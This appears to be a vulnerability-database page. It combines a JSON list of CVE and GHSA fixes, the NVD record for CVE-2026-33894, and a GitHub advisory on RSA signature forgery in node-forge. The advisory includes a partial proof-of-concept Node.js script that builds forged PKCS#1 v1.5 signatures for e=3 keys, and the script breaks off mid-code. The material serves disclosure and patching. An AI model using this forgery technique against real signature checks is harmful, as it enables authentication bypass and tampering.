      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3p68-rc4w-qgx5"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3w6x-2g7m-8v23"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-442j-39wm-28r2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-445q-vr5w-6q77"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-458j-xx4x-4375"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-46wh-pxpv-q5gq"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5c6j-r48x-rmvq"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5c9x-8gcm-mpgx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5m6q-g25r-mvwx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5pq2-9x2x-5p6w"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-62hf-57xw-28j9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-69xw-7hcm-h432"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-6chq-wfr3-2hj9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-7rx3-28cr-v5wh"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-92pp-h63x-v22m"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-9cx6-37pm-9jff"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-9vqf-7f2p-gf9v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-crv5-9vww-q3g8"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-fvcv-3m26-pcqx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-h7mw-gpvr-xq4m"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-j3q9-mxjg-w52f"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-jg4p-7fhp-p32p"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-m7pr-hjqh-92cm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-p6xx-57qc-3wxr"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-p77w-8qqv-26rm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-pf86-5x62-jrwf"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-pmwg-cvhr-8vh7"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-ppp5-5v6c-4jwp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-q3j6-qgpj-74h6"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-q5qw-h33p-qvwr"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-q67f-28xg-22rw"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-q8qp-cvcw-x6jj"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-qj8w-gfj5-8c6v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-qp7p-654g-cw7p"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-r4q5-vmmm-2653"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-r5rp-j6wh-rvv4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v39h-62p7-jpjc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v8w9-8mx6-g223"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v9jr-rg53-9pgp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-vf2m-468p-8v99"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-w9j2-pvgh-6h63"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-wc8c-qw6v-h7f6"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-wmmm-f939-6g9c"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xf4j-xp2r-rqqx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xhjh-pmcv-23jw"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xhpv-hc6g-r9c6"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xjpj-3mr7-gcpf"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xpcf-pg52-r92g"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xx6v-rp6x-q39c"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29045"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29085"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29086"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29087"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30827"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33896"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33916"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33937"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34043"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35213"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39406"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39407"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39408"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39409"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39410"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41238"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41239"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42034"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42036"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42037"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42038"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42040"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42042"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42264"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42338"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44455"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44456"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44457"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44458"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44459"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4923"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6321"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6322"
    }
  ],
  "related": [],
  "schema_version": "1.7.3",
  "summary": "Security fixes for CVE-2025-62718, CVE-2025-69873, CVE-2026-29045, CVE-2026-29085, CVE-2026-29086, CVE-2026-29087, CVE-2026-2950, CVE-2026-30827, CVE-2026-33750, CVE-2026-33891, CVE-2026-33894, CVE-2026-33895, CVE-2026-33896, CVE-2026-33916, CVE-2026-33937, CVE-2026-34043, CVE-2026-35213, CVE-2026-39406, CVE-2026-39407, CVE-2026-39408, CVE-2026-39409, CVE-2026-39410, CVE-2026-40175, CVE-2026-41238, CVE-2026-41239, CVE-2026-41240, CVE-2026-42033, CVE-2026-42034, CVE-2026-42035, CVE-2026-42036, CVE-2026-42037, CVE-2026-42038, CVE-2026-42039, CVE-2026-42040, CVE-2026-42041, CVE-2026-42042, CVE-2026-42043, CVE-2026-42044, CVE-2026-42264, CVE-2026-42338, CVE-2026-44455, CVE-2026-44456, CVE-2026-44457, CVE-2026-44458, CVE-2026-44459, CVE-2026-4800, CVE-2026-4923, CVE-2026-4926, CVE-2026-6321, CVE-2026-6322, ghsa-2328-f5f3-gj25, ghsa-26pp-8wgv-hjvm, ghsa-27v5-c462-wpq7, ghsa-2g4f-4pwh-qvx6, ghsa-2qvq-rjwj-gvw9, ghsa-2w6w-674q-4c4q, ghsa-39q2-94rc-95cp, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3v7f-55p6-f55p, ghsa-3w6x-2g7m-8v23, ghsa-442j-39wm-28r2, ghsa-445q-vr5w-6q77, ghsa-458j-xx4x-4375, ghsa-46wh-pxpv-q5gq, ghsa-5c6j-r48x-rmvq, ghsa-5c9x-8gcm-mpgx, ghsa-5m6q-g25r-mvwx, ghsa-5pq2-9x2x-5p6w, ghsa-62hf-57xw-28j9, ghsa-69xw-7hcm-h432, ghsa-6chq-wfr3-2hj9, ghsa-7rx3-28cr-v5wh, ghsa-92pp-h63x-v22m, ghsa-9cx6-37pm-9jff, ghsa-9vqf-7f2p-gf9v, ghsa-c2c7-rcm5-vvqj, ghsa-crv5-9vww-q3g8, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-fvcv-3m26-pcqx, ghsa-h7mw-gpvr-xq4m, ghsa-j3q9-mxjg-w52f, ghsa-jg4p-7fhp-p32p, ghsa-m7pr-hjqh-92cm, ghsa-p6xx-57qc-3wxr, ghsa-p77w-8qqv-26rm, ghsa-pf86-5x62-jrwf, ghsa-pmwg-cvhr-8vh7, ghsa-ppp5-5v6c-4jwp, ghsa-q3j6-qgpj-74h6, ghsa-q5qw-h33p-qvwr, ghsa-q67f-28xg-22rw, ghsa-q8qp-cvcw-x6jj, ghsa-qj8w-gfj5-8c6v, ghsa-qp7p-654g-cw7p, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-r5rp-j6wh-rvv4, ghsa-v2v4-37r5-5v8g, ghsa-v39h-62p7-jpjc, ghsa-v8w9-8mx6-g223, ghsa-v9jr-rg53-9pgp, ghsa-vf2m-468p-8v99, ghsa-w9j2-pvgh-6h63, ghsa-wc8c-qw6v-h7f6, ghsa-wmmm-f939-6g9c, ghsa-xf4j-xp2r-rqqx, ghsa-xhjh-pmcv-23jw, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf, ghsa-xpcf-pg52-r92g, ghsa-xx6v-rp6x-q39c applied in versions: 2.19.5-r0",
  "upstream": [
    "CVE-2025-62718",
    "CVE-2025-69873",
    "CVE-2026-29045",
    "CVE-2026-29085",
    "CVE-2026-29086",
    "CVE-2026-29087",
    "CVE-2026-2950",
    "CVE-2026-30827",
    "CVE-2026-33750",
    "CVE-2026-33891",
    "CVE-2026-33894",
    "CVE-2026-33895",
    "CVE-2026-33896",
    "CVE-2026-33916",
    "CVE-2026-33937",
    "CVE-2026-34043",
    "CVE-2026-35213",
    "CVE-2026-39406",
    "CVE-2026-39407",
    "CVE-2026-39408",
    "CVE-2026-39409",
    "CVE-2026-39410",
    "CVE-2026-40175",
    "CVE-2026-41238",
    "CVE-2026-41239",
    "CVE-2026-41240",
    "CVE-2026-42033",
    "CVE-2026-42034",
    "CVE-2026-42035",
    "CVE-2026-42036",
    "CVE-2026-42037",
    "CVE-2026-42038",
    "CVE-2026-42039",
    "CVE-2026-42040",
    "CVE-2026-42041",
    "CVE-2026-42042",
    "CVE-2026-42043",
    "CVE-2026-42044",
    "CVE-2026-42264",
    "CVE-2026-42338",
    "CVE-2026-44455",
    "CVE-2026-44456",
    "CVE-2026-44457",
    "CVE-2026-44458",
    "CVE-2026-44459",
    "CVE-2026-4800",
    "CVE-2026-4923",
    "CVE-2026-4926",
    "CVE-2026-6321",
    "CVE-2026-6322",
    "ghsa-2328-f5f3-gj25",
    "ghsa-26pp-8wgv-hjvm",
    "ghsa-27v5-c462-wpq7",
    "ghsa-2g4f-4pwh-qvx6",
    "ghsa-2qvq-rjwj-gvw9",
    "ghsa-2w6w-674q-4c4q",
    "ghsa-39q2-94rc-95cp",
    "ghsa-3mfm-83xf-c92r",
    "ghsa-3p68-rc4w-qgx5",
    "ghsa-3v7f-55p6-f55p",
    "ghsa-3w6x-2g7m-8v23",
    "ghsa-442j-39wm-28r2",
    "ghsa-445q-vr5w-6q77",
    "ghsa-458j-xx4x-4375",
    "ghsa-46wh-pxpv-q5gq",
    "ghsa-5c6j-r48x-rmvq",
    "ghsa-5c9x-8gcm-mpgx",
    "ghsa-5m6q-g25r-mvwx",
    "ghsa-5pq2-9x2x-5p6w",
    "ghsa-62hf-57xw-28j9",
    "ghsa-69xw-7hcm-h432",
    "ghsa-6chq-wfr3-2hj9",
    "ghsa-7rx3-28cr-v5wh",
    "ghsa-92pp-h63x-v22m",
    "ghsa-9cx6-37pm-9jff",
    "ghsa-9vqf-7f2p-gf9v",
    "ghsa-c2c7-rcm5-vvqj",
    "ghsa-crv5-9vww-q3g8",
    "ghsa-f23m-r3pf-42rh",
    "ghsa-f886-m6hf-6m8v",
    "ghsa-fvcv-3m26-pcqx",
    "ghsa-h7mw-gpvr-xq4m",
    "ghsa-j3q9-mxjg-w52f",
    "ghsa-jg4p-7fhp-p32p",
    "ghsa-m7pr-hjqh-92cm",
    "ghsa-p6xx-57qc-3wxr",
    "ghsa-p77w-8qqv-26rm",
    "ghsa-pf86-5x62-jrwf",
    "ghsa-pmwg-cvhr-8vh7",
    "ghsa-ppp5-5v6c-4jwp",
    "ghsa-q3j6-qgpj-74h6",
    "ghsa-q5qw-h33p-qvwr",
    "ghsa-q67f-28xg-22rw",
    "ghsa-q8qp-cvcw-x6jj",
    "ghsa-qj8w-gfj5-8c6v",
    "ghsa-qp7p-654g-cw7p",
    "ghsa-r4q5-vmmm-2653",
    "ghsa-r5fr-rjxr-66jc",
    "ghsa-r5rp-j6wh-rvv4",
    "ghsa-v2v4-37r5-5v8g",
    "ghsa-v39h-62p7-jpjc",
    "ghsa-v8w9-8mx6-g223",
    "ghsa-v9jr-rg53-9pgp",
    "ghsa-vf2m-468p-8v99",
    "ghsa-w9j2-pvgh-6h63",
    "ghsa-wc8c-qw6v-h7f6",
    "ghsa-wmmm-f939-6g9c",
    "ghsa-xf4j-xp2r-rqqx",
    "ghsa-xhjh-pmcv-23jw",
    "ghsa-xhpv-hc6g-r9c6",
    "ghsa-xjpj-3mr7-gcpf",
    "ghsa-xpcf-pg52-r92g",
    "ghsa-xx6v-rp6x-q39c"
  ]
}

FKIE_CVE-2026-33894

Vulnerability from fkie_nvd - Published: 2026-03-27 21:17 - Updated: 2026-06-17 10:38

Severity

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://datatracker.ietf.org/doc/html/rfc2313#section-8	Third Party Advisory
security-advisories@github.com	https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp	Vendor Advisory
security-advisories@github.com	https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp	Vendor Advisory
security-advisories@github.com	https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp	Vendor Advisory
security-advisories@github.com	https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp	Vendor Advisory
security-advisories@github.com	https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE	Third Party Advisory
security-advisories@github.com	https://www.rfc-editor.org/rfc/rfc8017.html	Third Party Advisory

Impacted products

	Vendor	Product	Version
	digitalbazaar	forge	*

JSON

To clipboard

{
  "affected": [
    {
      "affectedData": [
        {
          "product": "forge",
          "vendor": "digitalbazaar",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.4.0"
            }
          ]
        }
      ],
      "source": "security-advisories@github.com"
    }
  ],
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digitalbazaar:forge:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "824A6B69-D102-48A0-B8F2-24DEC4D749DD",
              "versionEndExcluding": "1.4.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing \u201cgarbage\u201d bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.  Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue."
    }
  ],
  "id": "CVE-2026-33894",
  "lastModified": "2026-06-17T10:38:16.430",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ],
    "ssvcV203": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "ssvcData": {
          "id": "CVE-2026-33894",
          "options": [
            {
              "exploitation": "poc"
            },
            {
              "automatable": "yes"
            },
            {
              "technicalImpact": "partial"
            }
          ],
          "role": "CISA Coordinator",
          "timestamp": "2026-03-31T14:04:30.304300Z",
          "version": "2.0.3"
        }
      }
    ]
  },
  "published": "2026-03-27T21:17:25.983",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.rfc-editor.org/rfc/rfc8017.html"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-347"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-PPP5-5V6C-4JWP

Vulnerability from github – Published: 2026-03-26 22:02 – Updated: 2026-03-27 21:50

Summary

Forge has signature forgery in RSA-PKCS due to ASN.1 extra field

Details

Summary

RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.

Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries.

Impacted Deployments

Tested commit: 8e1d527fe8ec2670499068db783172d4fb9012e5 Affected versions: tested on v1.3.3 (latest release) and recent prior versions.

Configuration assumptions: - Invoke key.verify with defaults (default scheme uses RSASSA-PKCS1-v1_5). - _parseAllDigestBytes: true (default setting).

Root Cause

In lib/rsa.js, key.verify(...), forge decrypts the signature block, decodes PKCS#1 v1.5 padding (_decodePkcs1_v1_5), parses ASN.1, and compares capture.digest to the provided digest.

Two issues are present with this logic:

Strict DER byte-consumption (_parseAllDigestBytes) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it.
_decodePkcs1_v1_5 comments mention that PS < 8 bytes should be rejected, but does not implement this logic.

Reproduction Steps

Use Node.js (tested with v24.9.0) and clone digitalbazaar/forge at commit 8e1d527fe8ec2670499068db783172d4fb9012e5.
Place and run the PoC script (repro_min.js) with node repro_min.js in the same level as the forge folder.
The script generates a fresh RSA keypair (4096 bits, e=3), creates a normal control signature, then computes a forged candidate using cube-root interval construction.
The script verifies both signatures with:
forge verify (_parseAllDigestBytes: true), and
Node/OpenSSL verify (crypto.verify with RSA_PKCS1_PADDING).
Confirm output includes:
control-forge-strict: true
control-node: true
forgery (forge library, strict): true
forgery (node/OpenSSL): false

Proof of Concept

Overview: - Demonstrates a valid control signature and a forged signature in one run. - Uses strict forge parsing mode explicitly (_parseAllDigestBytes: true, also forge default). - Uses Node/OpenSSL as an differential verification baseline. - Observed output on tested commit:

control-forge-strict: true
control-node: true
forgery (forge library, strict): true
forgery (node/OpenSSL): false

repro_min.js

#!/usr/bin/env node
'use strict';

const crypto = require('crypto');
const forge = require('./forge/lib/index');

// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:
// SEQUENCE {
//   SEQUENCE { OID sha256, NULL },
//   OCTET STRING <32-byte digest>
// }
// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20
const DIGESTINFO_SHA256_PREFIX = Buffer.from(
  '300d060960864801650304020105000420',
  'hex'
);

const toBig = b => BigInt('0x' + (b.toString('hex') || '0'));
function toBuf(n, len) {
  let h = n.toString(16);
  if (h.length % 2) h = '0' + h;
  const b = Buffer.from(h, 'hex');
  return b.length < len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;
}
function cbrtFloor(n) {
  let lo = 0n;
  let hi = 1n;
  while (hi * hi * hi <= n) hi <<= 1n;
  while (lo + 1n < hi) {
    const mid = (lo + hi) >> 1n;
    if (mid * mid * mid <= n) lo = mid;
    else hi = mid;
  }
  return lo;
}
const cbrtCeil = n => {
  const f = cbrtFloor(n);
  return f * f * f === n ? f : f + 1n;
};
function derLen(len) {
  if (len < 0x80) return Buffer.from([len]);
  if (len <= 0xff) return Buffer.from([0x81, len]);
  return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);
}

function forgeStrictVerify(publicPem, msg, sig) {
  const key = forge.pki.publicKeyFromPem(publicPem);
  const md = forge.md.sha256.create();
  md.update(msg.toString('utf8'), 'utf8');
  try {
    // verify(digestBytes, signatureBytes, scheme, options):
    // - digestBytes: raw SHA-256 digest bytes for `msg`
    // - signatureBytes: binary-string representation of the candidate signature
    // - scheme: undefined => default RSASSA-PKCS1-v1_5
    // - options._parseAllDigestBytes: require DER parser to consume all bytes
    //   (this is forge's default for verify; set explicitly here for clarity)
    return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };
  } catch (err) {
    return { ok: false, err: err.message };
  }
}

function main() {
  const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 4096,
    publicExponent: 3,
    privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
    publicKeyEncoding: { type: 'pkcs1', format: 'pem' }
  });

  const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });
  const nBytes = Buffer.from(jwk.n, 'base64url');
  const n = toBig(nBytes);
  const e = toBig(Buffer.from(jwk.e, 'base64url'));
  if (e !== 3n) throw new Error('expected e=3');

  const msg = Buffer.from('forged-message-0', 'utf8');
  const digest = crypto.createHash('sha256').update(msg).digest();
  const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);

  // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.
  const k = nBytes.length;
  // ffCount can be set to any value at or below 111 and produce a valid signature.
  // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.
  // However, current versions of node forge do not check for this.
  // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.
  const ffCount = 0; 
  // `garbageLen` affects DER length field sizes, which in turn affect how
  // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.
  // A small cap (8) is enough here: DER length-size transitions are discrete
  // and few (<128, <=255, <=65535, ...), so this stabilizes quickly.
  let garbageLen = 0;
  for (let i = 0; i < 8; i += 1) {
    const gLenEnc = derLen(garbageLen).length;
    const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;
    const seqLenEnc = derLen(seqLen).length;
    const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;
    const next = k - fixed;
    if (next === garbageLen) break;
    garbageLen = next;
  }
  const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;
  const prefix = Buffer.concat([
    Buffer.from([0x00, 0x01]),
